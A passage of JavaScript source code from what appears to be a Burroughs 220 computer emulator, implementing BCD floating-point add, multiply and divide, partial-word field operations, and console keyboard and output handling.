was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = 0; } } else if (am == 0) { // mantissa is zero => result is zero ax = sign = 0; timing += 0.065; } else { // normalize the result as necessary while (am < 0x10000000) { if (ax > 0 && shifts < 8) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingAdd__WITH_ROUND = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ /* THIS IS AN EXPERIMENTAL VERSION THAT ROUNDS RESULTS */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; am *= 0x100; // insert two low-order rounding digits dm *= 0x100; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { if (++shifts < 8) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift right } else { sign = aSign; // result is value in A limiter = 0; break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { if (++shifts < 8) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { am = dm; // result is value in D with adjusted sign ax = dx; limiter = 0; break; } } // Add the mantissas if (shifts < 8) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 13, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 13, 1, 1); timing += 0.060; } } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x10000000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. limiter = 0; if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = limiter = 0; } } else if (am == 0) { // mantissa is zero ax = sign = limiter = 0; timing += 0.065; } else { // normalize the result as necessary shifts = 0; while (am < 0x1000000000) { // NOTE: THIS INCLUDES THE ROUNDING DIGITS if (ax > 0) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. d = am%0x100; // get the rounding digits am = (am - d)/0x100; // scale back to 8 digits if (d >= 0x50) { // round required am = this.bcdAdd(1, am, 11, 0, 0); if (am >= 0x100000000) { ax = this.bcdAdd(1, ax, 3, 0, 0); // ignore exponent overflow, for now d = am%0x10; am = (am - d)/0x10; if (d >= 5) { // round again after scale right am = this.bcdAdd(1, am, 11, 0, 0); } } } this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingMultiply = function floatingMultiply() { /* Algebraically multiply the floating-point multiplicand in the IB register by the floating-point multiplier in the A register, producing a 18-digit product (16 mantissa + 2 exponent) in A and R. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad; // current product (A) digit; var ax; // product/multiplier (A) exponent var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx; // multiplicand exponent var dm; // multiplicand mantissa var dSign; // multiplicand sign var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = 0; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var timing = 0.085; // minimum instruction timing var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000) { // A is not normalized, so assume zero this.A.set(0); this.R.set(0); } else if (dm < 0x10000000) { // D is not normalized, so assume zero this.A.set(0); this.R.set(0); } else { sign = (aSign ^ dSign); rm = am; // shift A:08 to R:98, then shift R again right 1 am = 0; // result of shifting A to R dm *= 0x100; // circulate D two places left (D:22 is 0, so a simple shift left will do) x = this.bcdAdd(ax, dx, 3); // do exponent arithmetic into temp x ax = this.bcdAdd(0x50, x, 3, 1, 1);// subtract the exponent bias from the A exponent timing += 0.080; if (x >= 0x150) { // exponent overflow this.OFT.set(1); this.A.set(am); this.R.set(rm); } else if (x < 0x50) { // exponent underflow this.A.set(0); this.R.set(0); dm %= 0x100000000; } else { // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 8 digits, // we're done, except for normalization. for (x=0; x<8; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { am = this.bcdAdd(am, dm, 11, 0, 0); } // while rd ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x // Normalize the result as necessary. if (am >= 0x1000000000) { // Shift product two places right timing += 0.020; ad = am % 0x100; am = (am-ad)/0x100; rd = rm % 0x100; rm = (rm-rd)/0x100 + ad*0x100000000; } else if (ax > 0) { // Shift product one place right timing += 0.010; ad = am % 0x10; am = (am-ad)/0x10; rd = rm % 0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; ax = this.bcdAdd(0x01, ax, 3, 1, 1); // decrement exponent } else { // Exponent underflow: set R and the reconstructed A to zero. am = ax = rm = sign = 0; } // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(sign*0x10000000000 + rm); timing += 0.005*count; } // Set the registers and toggles for display this.SGT.set(sign); this.DST.set(dSign); this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingDivide = function floatingDivide() { /* Algebraically divide the 18-digit (16 mantissa + 2 exponent) floating- point dividend in the A & R registers by the floating-point divisor in the D register, producing a 9- or 10-digit quotient in the A & R registers and a 6- or 7-digit remainder in the low-order digits of the R register. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad = 0; // current remainder (A) digit var ax = 0; // dividend/quotient exponent var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx = 0; // divisor exponent var dm = 0; // divisor mantissa var dSign = 0; // divisor sign var rd = 0; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (drop sign) var rSign = (this.R.value-rm)/0x10000000000; // R register sign (restore later) var sign = 0; // local copy of sign toggle (sign of quotient) var timing = 0.085; // minimum instruction timing var tSign = 1; // sign for timing count accumulation var x = 0; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.SUT.set(1); ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000 && dm >= 0x10000000) { this.A.set(0); // A is not normalized but D is, quotient=0 this.R.set(0); } else if (dm < 0x10000000) { this.OFT.set(1); // D is not normalized, overflow (div 0) this.A.set(ax*0x100000000 + am); } else { // Add the exponent bias to the dividend exponent and check for underflow ax = this.bcdAdd(ax, 0x50, 3); timing += 0.085; if (ax < dx) { // Exponents differ by more than 50 -- underflow sign = 0; ax = this.bcdAdd(dx, ax, 3, 1, 1); this.A.set(0); this.R.set(0); } else { // Subtract the exponents and check for overflow ax = this.bcdAdd(dx, ax, 3, 1, 1); if (ax > 0x99) { this.OFT.set(1); sign = 0; this.A.set(am); } else { // Shift A+R 1 digit right (exponent adjustment occurs later ad = am%0x10; am = (am-ad)/0x10; rd = rm%0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, but we don't have sufficient technical details to know for sure. // The following is adapted from the 205 implementation. for (x=0; x<11; ++x) { // Repeatedly subtract D from A until we would get underflow. ad = 0; /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++ad; count += tSign; } // Shift A & R to the left one digit, accumulating the quotient digit in R rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10 + ad; // Shift into remainder except on last digit. if (x < 10) { am = am*0x10 + rd; } tSign = -tSign; } // for x /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Rotate the quotient and remainder for 10 digits to exchange registers for (x=0; x<10; ++x) { ad = am%0x10; rd = rm%0x10; rm = (rm - rd)/0x10 + ad*0x1000000000; am = (am - ad)/0x10 + rd*0x1000000000; } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 98, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ if (am >=0x1000000000 && ax == 0x99) { this.OFT.set(1); this.A.set(am); this.R.set(rSign*0x10000000000 + rm); } else { if (am < 0x1000000000) { // Normalize one digit to the right ad = am%0x10; am = (am - ad)/0x10; rm = (rm - rm%0x10)/0x10 + ad*0x1000000000; } else { // Normalize two digits to the right and adjust exponent ad = am%0x100; am = (am - ad)/0x100; rm = (rm - rm%0x100)/0x100 + ad*0x100000000; ax = this.bcdAdd(ax, 1, 3); } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 99, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(rSign*0x10000000000 + rm); } timing += 4.075 + 0.060*count; } } // Set the registers and toggles for display this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.SGT.set(sign); this.DST.set(dSign); this.opTime = timing; }; /*********************************************************************** * Partial-Word Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.compareField = function compareField() { /* Implements CFA/CFR (18). Compares the value in either the A or R register to a word in memory, either whole word or a designated partial field, by subtracting the respective memory digits from the register digits. Sets the comparison indicators (UET, HIT) to indicate whether the register field is LOW (UET=1, HIT=0), EQUAL (UET=0, HIT=1), or HIGH (UET=1, HIT=1) with respect to the memory field. Note that the sign digit, if included in the comparison is handled in a very strange fashion -- see the discussion in the 220 Operational Characteristics manual for the truly gruesome details. And no, I didn't get this right the first time, nor the second, nor the third */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var compl = 1; // do complement addition by default, since we're subtracting var dd; // current memory (D-register) digit var dSign = 0; // memory (D-register) sign var dw; // memory (D-register) word var high = 1; // initialize compare toggles to EQUAL var L; // partial-word length var rSign; // register sign digit var rd; // current register digit var rw; // register word value var s; // partial-word "s" digit var sign = 1; // default sign is negative, since we're subtracting var unequal = 0; // initialize compare toggles to EQUAL this.opTime = 0.150; this.E.set(this.CADDR); this.UET.set(0); this.HIT.set(0); this.readMemory(); if (!this.MET.value) { this.SUT.set(1); dw = this.IB.value; this.D.set(dw); if (this.CCONTROL%0x10 == 1) { rw = this.R.value; // CFR: Compare Field R } else { rw = this.A.value; // CFA: Compare Field A } // Determine field lengths for partial- or whole-word comparison. if (!(this.CCONTROL & 0x10)) { // whole word s = 10; L = 11; } else { // partial word s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } } // If the sign digit is included in the comparison, set up for algebraic // comparison and the strange sign ordering. This is tricky. Basically, // the non-signed digits need to be compared in a signed, algebraic manner, // but the transformed sign digits need to be compared unsigned. Since the // compare is based on a signed subtraction, then if the original sign of // either of the operands indicates negative (1, 2, 3), we use the 9s- // complement of the transformed sign digit for that operand, converting // the unsigned compare of the transformed sign digits into a signed one. if (L > s) { // sign digit is included rSign = (rw - rw%0x10000000000)/0x10000000000; if (rSign < 8) { rSign ^= 3; } dSign = (dw - dw%0x10000000000)/0x10000000000; if (dSign < 8) { dSign ^= 3; } if (dSign > 2) { sign = 1; } else { // treat as negative sign = 0; dSign = 9-dSign; } if (rSign > 2) { compl = sign; } else { // treat as negative compl = 1-sign; rSign = 9-rSign; } carry = compl; rw = rw%0x10000000000 + rSign*0x10000000000; dw = dw%0x10000000000 + dSign*0x10000000000; } // Now go through a modified add cycle, subtracting the digit pairs using // 10s-complement addition, and marking the result unequal if any digits differ. this.DC.set(0x09); // set up to rotate through 11 digits do { rd = rw%0x10; dd = dw%0x10; if (s < 10) { // positition to the "s" digit ++s; } else if (L > 0) { // compare digits in the sL field --L; this.X.set(rd); // for display only this.Y.set(dd); adder = (compl ? 9-rd : rd) + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only if (adder) { // if the adder is not zero, unequal = 1; // result will be unequal, determined by sign } } else { // Ignore any digits after L is exhausted this.DC.set(0x19); // (the 220 didn't quit early like this, though) } // Shift both words right (no need to rotate them) rw = (rw-rd)/0x10; dw = (dw-dd)/0x10; this.DC.inc(); } while (this.DC.value < 0x20) // If there is a final carry, we keep the original sign; if we are not complementing, // force an unequal result. If there is no final carry, we complement the result sign. if (carry) { if (!compl) { unequal = 1; } } else { sign = 1-sign; } // Set the console lamps and toggles to the result. if (unequal) { // result is unequal, sign determines low/high high = 1-sign; // negative=low, positive=high this.compareEqualLamp.set(0); this.compareLowLamp.set(1-high); this.compareHighLamp.set(high); } else { this.compareEqualLamp.set(1); this.compareLowLamp.set(0); this.compareHighLamp.set(0); } this.DST.set(dSign%2); this.SGT.set(sign); this.HIT.set(high); this.UET.set(unequal); this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { this.setProgramCheck(1); } } }; /**************************************/ B220Processor.prototype.increaseFieldLocation = function increaseFieldLocation() { /* Implements IFL (26). Increments a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 0; // carry flag defaults to 0, since we're adding var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(0); this.DST.set(0); this.SGT.set(0); this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // increase value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the increase value right } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.OFT.set(1); // set overflow if there's a carry } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.decreaseFieldLocation = function decreaseFieldLocation(loadB) { /* Implements DFL/DLB (27, 28). Decrements a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current decrease digit var rw; // decrease value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(1); this.DST.set(1); this.SGT.set(0); this.RPT.set(0); if (loadB) { this.B.set(0); } this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // decrease value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from decrease value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the decrease value right if (loadB) { // shift adder digit into B if op=DLB this.B.value = (this.B.value - this.B.value%0x10)/0x10 + adder*0x1000; } } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.RPT.set(1); // set repeat toggle if no underflow } if (loadB) { // set B register if op=DLB this.B.set(this.B.value); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.branchField = function branchField(regValue) { /* Implements BFA/BFR (36, 37). Compares digits of a designated partial field in the A or R register word to a rotating two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current pattern digit var dw; // rotating 2-digit pattern value var equal = 1; // start out assuming equality var L; // partial-word length var rd; // current register digit var rw = regValue; // register value var s; // partial-word "s" digit this.opTime = 0.075; this.SUT.set(1); dw = this.CCONTROL%0x100; // 2-digit pattern to compare s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the word and compare digits to the rotating pattern. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value if (s < 10) { // positition to the "s" digit ++s; // just ignore any initial digits } else if (L > 0) { // operate on the partial-word field --L; dd = dw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only dw = (dw-dd)/0x10 + dd*0x10;// rotate the 2-digit pattern if (adder) { equal = 0; // if the adder is not zero, fields are unequal } } else { // just ignore any remaining digits after L is exhausted } rw = (rw-rd)/0x10; // shift register word right (no need to rotate it) this.DC.inc(); } // while DC < 20 this.C10.set(carry); // set carry toggle, for display only if (equal) { // if equality exists, branch this.opTime += 0.020; this.P.set(this.CADDR); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } }; /**************************************/ B220Processor.prototype.storeRegister = function storeRegister() { /* Implements STA/STR/STB (40). Stores a whole word or a designated partial field in a memory word based on the sL (22) digits of the C register */ var adder; // current adder digit var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit var xd; // current D-register digit var xw = 0; // word used to construct the D-register value this.opTime = 0.100; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { switch (this.CCONTROL%0x10) { case 1: // STR: Store R rw = this.R.value; break; case 2: // STB: Store B rw = this.B.value; break; default: // STA: Store A rw = this.A.value; break; } // switch if ((this.CCONTROL & 0x10) == 0) { // whole-word store this.D.set(rw); this.IB.set(rw); s = L = 0; } else { // partial-word store this.D.set(0); dw = this.IB.value; s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the field and copy the digits this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the memory digit xd = 0; } else if (L > 0) { // operate on the partial-word field --L; adder = rd; // copy digit from register into memory value xd = rd; } else { adder = dd; // just copy any remaining memory digits after L is exhausted xd = 0; } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result digit into memory value rw = (rw-rd)/0x10; // shift register value right (no need to rotate it) xw = xw/0x10 + xd*0x10000000000; // copy zero or register digit into D-register this.DC.inc(); } // while DC < 20 this.D.set(xw); this.IB.set(dw); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /*********************************************************************** * Console I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.keyboardAction = function keyboardAction(d) { /* Receives a single digit from the Console keyboard. Non-negative values of d indicate decimal digit keys and are shifted into the low-order digit of D. Negative values of d indicate function keys: -1 = ADD key pressed -2 = C key pressed -3 = E key pressed -4 = EXAM key pressed -5 = ENT key pressed -6 = STEP key pressed */ var word = this.D.value; if (!this.RUT.value) { // make sure we're not running switch (d) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 9: this.D.set((this.D.value%0x10000000000)*0x10 + d); break; case -1: // ADD key pressed this.keyboardAdd(); break; case -2: // C key pressed, do D -> C this.fetchWordToC(word); break; case -3: // E key pressed, do D -> E this.E.set(word%0x10000); this.D.set(0); break; case -4: // EXAM key pressed, memory -> D this.readMemory(); if (!this.MET.value) { // invalid address this.E.inc(); this.D.set(this.IB.value); } break; case -5: // ENT key pressed, D -> memory this.IB.set(word); this.writeMemory(); if (!this.MET.value) { this.E.inc(); } break; case -6: // STEP key pressed this.step(); break; } // switch d } }; /**************************************/ B220Processor.prototype.keyboardAdd = function keyboardAdd() { /* Algebraically add the addend (D) to the augend (A), returning the result in A. Similar to integerAdd(), except (a) the processor must not be running, (b) there is no reference to memory, (c) the addend comes from D instead of IB, (d) subtract is not possible, although the numbers may be signed, and (e) the processor is returned to running status after the add completes. No timing is accumulated because the processor has been stopped */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm = this.D.value % 0x10000000000; // addend mantissa var dSign = ((this.D.value - dm)/0x10000000000)%2; var sign = dSign; // local copy of sign toggle if (!this.RUT.value) { // we must be stopped this.SUT.set(0); compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we // have overflow or need to recomplement the result. switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); this.A.set(am); this.start(); } }; /**************************************/ B220Processor.prototype.consoleOutputSign = function consoleOutputSign(printSign) { /* Outputs the sign character for a SPO (09) command and sets up to output the first number digit */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.ioComplete(true); } else { this.D.set(this.IB.value); this.execClock += 0.070; // estimate for memory access and rotation w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; // get the sign digit this.D.set(w*0x10 + d); // rotate D+sign left one this.DC.set(0x10); // set up for 10 more digits this.DPT.set(this.CCONTROL%0x10 == 1 && this.COP == 0x09); this.LT1.set(this.LEADINGZEROESSW); // use LT1 for leading-zero suppression (probably not accurate) this.EWT.set(0); this.PZT.set(d == 2 && !this.HOLDPZTZEROSW); this.PA.set(0x80 + d); // translate numerically this.asyncOn(); printSign(this.PA.value, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputChar = function consoleOutputChar(printChar) { /* Outputs the next character code for a SPO (09) command and sets up to output the next number digit. If the Shift Counter is already at 20, terminates the output operation and sends a Finish signal */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared if (this.EWT.value) { if (this.CCONTROL%0x1000 < 0x10) { this.asyncOn(); printChar(0x35, this.boundConsoleOutputFinished); } else { this.C.inc(); this.CADDR = this.C.value%0x10000; this.asyncOn(); printChar(0x35, this.boundConsoleOutputSign); } } else if (this.PZT.value) { // Output alphabetically w = this.D.value % 0x1000000000; d = (this.D.value - w)/0x1000000000; // get next 2 digits 